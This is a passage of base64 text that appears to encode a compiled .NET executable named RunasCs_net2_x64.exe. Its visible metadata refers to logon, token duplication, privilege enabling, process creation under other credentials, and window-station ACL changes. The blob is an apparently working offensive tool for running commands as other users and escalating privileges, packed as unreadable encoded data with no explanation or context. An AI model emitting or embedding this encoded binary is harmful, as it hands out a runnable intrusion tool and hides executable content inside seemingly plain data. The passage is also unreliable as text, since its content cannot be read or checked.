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AIAMsRAAAJANkRAAAKAOwRAgALAPoRAAABAHARAAACABgSAAADAHcRAAAEAIkRAAAFALsRAAAGAMsRAAAHANkRAQAIAOwRAgAJAPoRAgABAD4SAgACAEgSAAADAFMSAAAEAGQSAAABAGoSAgACAHASAAADAHkSAgAEAI4SAAAFAKISACAAAAAAAAABAK8SAAACAMQSAAADANISAgAEAOcSAAAFAI4QACAGAKMEAAAHAPYSAAABAAATAAABABYTAAACACATAAABACATAAABAD4SAAACAEgSAAABAD4SAAABAIsTAAACAOkQAAADAJQTAAAEAJgTAAAFAKMTAAAGALITAAAHAAATAAABAG0UAAACAHIUAgADAHkUAAAEAIAUAgAFAIgUACABAJgUACACAKMUAAADAI4QAAABAKwUAAACABoEAAADAKMUAAAEAI4QACAAAAAAAAABAIwHAAABAJQHAAABALgUAAABAMAUAAABAG0UAAACAMUUAAADANIUAAAEAIAUAgAFAIgUACAAAAAAAAABANcUAiACAOsUAAADAPgUAiAEAP4UACAAAAAAAAABAA0VAAACABIVAAADACIVAAAEADgVAAABAE4VAAACAGEVAAABANIUAAABAA0VAAACAGwVAAADAHcVAAABAIUVAAACAIwVAgADAJUVAAABAA0VAAACAJwVAAADAKoVAAAEAL0VAAAFAMYVAAABAA0VAAACAJwVAAADANUVAAAEAMAUAAABAOAVAAACAOMVAAADAO8VAAAEAPQVAAABAG0UAAACAMUUAAADAAIWAAABAAYWAAACABwWAAADACwWAAABADcWAAACAEQWACADAFIWAAAEAFYWAAAFAFwWAAAGAHEWAgAHAIkWAAABAOIQAAACAIsTAAABAPgUAAACAPYWAAADAPsWAAAEAAQXAAABAOIQAAACAIsTAAABAIQXAAABAJ0XAAACAKkXAAADAL8XAAAEANAXAgAFAOcXACAAAAAAAAABADcWAAACAC0QAAADAPQXAAAEAPsXAAABAAMYAAABAA0YAAABABkYAAABAB8YAAABAB8YAAABAB8YAAABAB8YAAABAB8YAAABAMMYAAABAMMYMQClBwYCOQClB+0BQQClBxoDSQClBx8DWQClB+0BYQClB+0BaQAuEykDeQBNEy0DeQBNEzMDeQBNE0YDaQBUE1ADgQBiEyYBkQB1E1oDkQCBE18DgQClBwYCmQDXE24DmQDpE3MDmQD0E3cDeQBNE3sDoQAOFIIDgQAlFIcDcQAxFIwDeQBNEwgDqQClB64DCQClB+0BIQClB+0BIQCPFncDeQCcFrkDeQBNE78DIQCqFsYDuQDWFssDwQDeFhoDeQBNE9ADaQDkFocDaQDxFtYDyQAjF+0DaQBUE/QDaQA8F/oDgQBLFwEEgQClBwUEaQBTFwoEgQBfFxkEaQBrFx8EkQCBEzsEeQB6F0EEgQCcFhkEoQCJF1AE4QClB+0BDAClB+0BCQAxFIwDDAAVGGAEeQBfF7kD6QAxGIAE6QA6GIkE8QBsGJIE8QB3GHMDDACMGJcEFACaGKcEFACmGKwEAQG7GO0BDgAEAA0ABwAIAD0ACAAMAEMACAAQAEgACQAUAFAACAAYAFUACQAcAFoACQAgAF8ACQAkAF8ACAAoAGQACACwAFUACAC0AEgACAC4AF8ACAC8ADABCADAAF8ACADEAFUACADIADUBCQDMAEgACQDQAF8ACQDUADoBBQDYAEIBBQDcAEQBBQDgAEYBBQDkAEgBBQDoAEoBCADsAFUACADwAEwBCQAEAQ8CCQAIARQCCQAMARkCCQAQAR4CCQAUAWQACQAYASMCCQAcARQCCQAgARQCCQAkARQCCQAoASgCCQAsAS0CCQAwATICCQA0ATcCCQA4ATwCCQA8AUECCQBAAUYCCQBEAVAACQBIAUsCCQBMAUgACQBQAV8ACQBUAVACCQBYAVUCCQBcAVoCCQBgAV8CCQBkAWQCCQBoAWkCCQBsAUMACQBwAW4CCQB0AUgACQB4AV8ACQB8AVACCQCAAVUCCQCEAVoCCQCIAV8CCQCMAWQCCQCQAUMACQCUAXMCCQCYAXgCCQCgAUgACQCkAV8ACQCoAVACCQCsAVUCCQCwAVAACQC0AUYCCQC4AUECCQC8ATwCCADEAUgACADIAV8ACADQAUgACADUAV8ACADYATABCADcAVACCADgAYkCCADkAY4CCADoAZMCCADsAVUCCADwAZgCCAAgAkgACAAkAl8ACAAoAjABCAAsAlACCAAwAokCCAA0Ao4CCAA4ApMCCAA8AlUCCABAApgCCABEAs0CCABIAtICCABMAtcCCABQAtwCCABUAuECCABYAuYCCABcAloCCABgAusCLgALANIELgATANsEYwGDAUgAgwGDAUgADQAlAxkAJQMbAEQBHQAnAx8AJwMhACcDhQBEAZEARAG7ALQDvQBEAckARAHdAEQB4QBEAeUARAHnAEQB+gBVBC0BtgM0AX0EUwFEAQQAAAAAAAQABAAAAAAAFgA7A0wDVQNnA5AD3wMPBCYERwRmBIUEjgSwBMcEgA+hDw8SMRJbFGIUWQSgBEABAwBGAgEAQAEFAFICAQBAAQcAZgICAEABCQB8AgIAYBELAJECAgAAAQ0AmwICAEQBDwCsAgIARAERAMQCAgBEARMA2AIDAEQBFQDwAgQAQAEXAPsCBABAARkABAMEAEQBJwD9BQUAQAEpABUGBgBEASsALgYFAAABLQBABgYARAEvAEwGBQBAATEAXwYGAEABMwBsBgYAAAE1AIQGAgBAATcAjAYGAEQBOQCiBgIARAE7ALwGAgBAAT0AzgYCAEQBPwDrBgIAQAFBAPgGAgBAAUMABgcCAEABRQANBwIAQAFHABQHAgBAAUkAKAcCAEABSwBCBwYAQAFNAFgHAgBEAU8AegcCAEABXwDSDAIARAFhAOYMAgAEgAAAAAAAAAAAAAAAAAAAAAA9DwAAAgAAAAAAAAAAAAAAAQB6AQAAAAACAAAAAAAAAAAAAAABAIMBAAAAAAMAAgAEAAIABQACAAYAAgAHAAIACAACAAkAAgALAAoADAAKAA0ACgAOAAoADwAKABAACgARAAoAEgAKABQAEwAVABMAFgATABcAEwAAAAA8TW9kdWxlPgBSdW5hc0NzX25ldDJfeDY0LmV4ZQBSdW5hc0NzAExVSUQATFVJRF9BTkRfQVRUUklCVVRFUwBUT0tFTl9QUklWSUxFR0VTAFNUQVJUVVBJTkZPAFByb2Nlc3NJbmZvcm1hdGlvbgBTRUNVUklUWV9BVFRSSUJVVEVTAFNFQ1VSSVRZX0lNUEVSU09OQVRJT05fTEVWRUwAV2luZG93U3RhdGlvbkRBQ0wAQUNDRVNTX01BU0sAU0VDVVJJVFlfSU5GT1JNQVRJT04AQUNMX0lORk9STUFUSU9OX0NMQVNTAFNJRF9OQU1FX1VTRQBTaWRJZGVudGlmaWVyQXV0aG9yaXR5AEFDTF9TSVpFX0lORk9STUFUSU9OAEFDRV9IRUFERVIAQUNDRVNTX0FMTE9XRURfQUNFAFRva2VuAFRPS0VOX0lORk9STUFUSU9OX0NMQVNTAFJ1bmFzQ3NNYWluQ2xhc3MATWFpbkNsYXNzAG1zY29ybGliAFN5c3RlbQBPYmplY3QAVmFsdWVUeXBlAEVudW0AZXJyb3Jfc3RyaW5nAFNXX0hJREUAU3RhcnRmX1VzZVN0ZEhhbmRsZXMAVG9rZW5UeXBlAEdFTkVSSUNfQUxMAExPR09OMzJfUFJPVklERVJfREVGQVVMVABDUkVBVEVfTk9fV0lORE9XAFNFX1BSSVZJTEVHRV9FTkFCTEVEAERVUExJQ0FURV9TQU1FX0FDQ0VTUwBCVUZGRVJfU0laRV9QSVBFAENsb3NlSGFuZGxlAFdhaXRGb3JTaW5nbGVPYmplY3QAQWRqdXN0VG9rZW5Qcml2aWxlZ2VzAExvb2t1cFByaXZpbGVnZVZhbHVlAExvZ29uVXNlcgBEdXBsaWNhdGVUb2tlbkV4AENyZWF0ZVByb2Nlc3NXaXRoTG9nb25XAENyZWF0ZVByb2Nlc3NBc1VzZXIAQ3JlYXRlUHJvY2Vzc1dpdGhUb2tlblcAQ3JlYXRlUGlwZQBSZWFkRmlsZQBEdXBsaWNhdGVIYW5kbGUAR2V0UHJvY2Vzc0Z1bmN0aW9uAEVuYWJsZVByaXZpbGVnZQBFbmFibGVBbGxQcml2aWxlZ2VzAENyZWF0ZUFub255bW91c1BpcGVFdmVyeW9uZUFjY2VzcwBSZWFkT3V0cHV0RnJvbVBpcGUAUnVuQXMATG93UGFydABIaWdoUGFydABMdWlkAEF0dHJpYnV0ZXMAUHJpdmlsZWdlQ291bnQAY2IAbHBSZXNlcnZlZABscERlc2t0b3AAbHBUaXRsZQBkd1gAZHdZAGR3WFNpemUAZHdZU2l6ZQBkd1hDb3VudENoYXJzAGR3WUNvdW50Q2hhcnMAZHdGaWxsQXR0cmlidXRlAGR3RmxhZ3MAd1Nob3dXaW5kb3cAY2JSZXNlcnZlZDIAbHBSZXNlcnZlZDIAaFN0ZElucHV0AGhTdGRPdXRwdXQAaFN0ZEVycm9yAHByb2Nlc3MAdGhyZWFkAHByb2Nlc3NJZAB0aHJlYWRJZABMZW5ndGgAbHBTZWN1cml0eURlc2NyaXB0b3IAYkluaGVyaXRIYW5kbGUAdmFsdWVfXwBTZWN1cml0eUFub255bW91cwBTZWN1cml0eUlkZW50aWZpY2F0aW9uAFNlY3VyaXR5SW1wZXJzb25hdGlvbgBTZWN1cml0eURlbGVnYXRpb24AVU9JX05BTUUAU0VDVVJJVFlfV09STERfUklEAEVSUk9SX0lOU1VGRklDSUVOVF9CVUZGRVIAU0VDVVJJVFlfREVTQ1JJUFRPUl9SRVZJU0lPTgBBQ0xfUkVWSVNJT04ATUFYRFdPUkQAQUNDRVNTX0FMTE9XRURfQUNFX1RZUEUAQ09OVEFJTkVSX0lOSEVSSVRfQUNFAElOSEVSSVRfT05MWV9BQ0UAT0JKRUNUX0lOSEVSSVRfQUNFAE5PX1BST1BBR0FURV9JTkhFUklUX0FDRQBOT19FUlJPUgBFUlJPUl9JTlZBTElEX0ZMQUdTAEdldFByb2Nlc3NXaW5kb3dTdGF0aW9uAEdldFVzZXJPYmplY3RJbmZvcm1hdGlvbgBPcGVuV2luZG93U3RhdGlvbgBPcGVuRGVza3RvcABDbG9zZVdpbmRvd1N0YXRpb24AQ2xvc2VEZXNrdG9wAFNldFByb2Nlc3NXaW5kb3dTdGF0aW9uAEZyZWVTaWQAR2V0VXNlck9iamVjdFNlY3VyaXR5AEdldFNlY3VyaXR5RGVzY3JpcHRvckRhY2wAR2V0QWNsSW5mb3JtYXRpb24ASW5pdGlhbGl6ZVNlY3VyaXR5RGVzY3JpcHRvcgBHZXRMZW5ndGhTaWQASW5pdGlhbGl6ZUFjbABHZXRBY2UAQWRkQWNlAEFkZEFjY2Vzc0FsbG93ZWRBY2UAU2V0U2VjdXJpdHlEZXNjcmlwdG9yRGFjbABTZXRVc2VyT2JqZWN0U2VjdXJpdHkAQ29weVNpZABTeXN0ZW0uVGV4dABTdHJpbmdCdWlsZGVyAExvb2t1cEFjY291bnROYW1lAGhXaW5zdGEAaERlc2t0b3AAdXNlclNpZAAuY3RvcgBHZXRVc2VyU2lkAEFkZEFsbG93ZWRBY2VUb0RBQ0wAQWRkQWNlVG9XaW5kb3dTdGF0aW9uAEFkZEFjZVRvRGVza3RvcABBZGRBY2xUb0FjdGl2ZVdpbmRvd1N0YXRpb24AQ2xlYW51cEhhbmRsZXMAREVMRVRFAFJFQURfQ09OVFJPTABXUklURV9EQUMAV1JJVEVfT1dORVIAU1lOQ0hST05JWkUAU1RBTkRBUkRfUklHSFRTX1JFUVVJUkVEAFNUQU5EQVJEX1JJR0hUU19SRUFEAFNUQU5EQVJEX1JJR0hUU19XUklURQBTVEFOREFSRF9SSUdIVFNfRVhFQ1VURQBTVEFOREFSRF9SSUdIVFNfQUxMAFNQRUNJRklDX1JJR0hUU19BTEwAQUNDRVNTX1NZU1RFTV9TRUNVUklUWQBNQVhJTVVNX0FMTE9XRUQAR0VORVJJQ19SRUFEAEdFTkVSSUNfV1JJVEUAR0VORVJJQ19FWEVDVVRFAEdFTkVSSUNfQUNDRVNTAERFU0tUT1BfUkVBRE9CSkVDVFMAREVTS1RPUF9DUkVBVEVXSU5ET1cAREVTS1RPUF9DUkVBVEVNRU5VAERFU0tUT1BfSE9PS0NPTlRST0wAREVTS1RPUF9KT1VSTkFMUkVDT1J